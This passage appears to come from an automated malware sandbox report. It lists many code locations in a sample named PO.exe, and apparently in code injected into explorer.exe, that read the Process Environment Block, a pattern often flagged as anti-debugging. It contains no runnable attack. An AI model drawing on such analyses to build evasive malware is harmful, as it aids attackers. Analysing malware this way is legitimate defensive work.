          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ABA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AE3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ACFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A78EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A68E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A48794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5B260 mov eax, dword ptr fs:[00000030h]
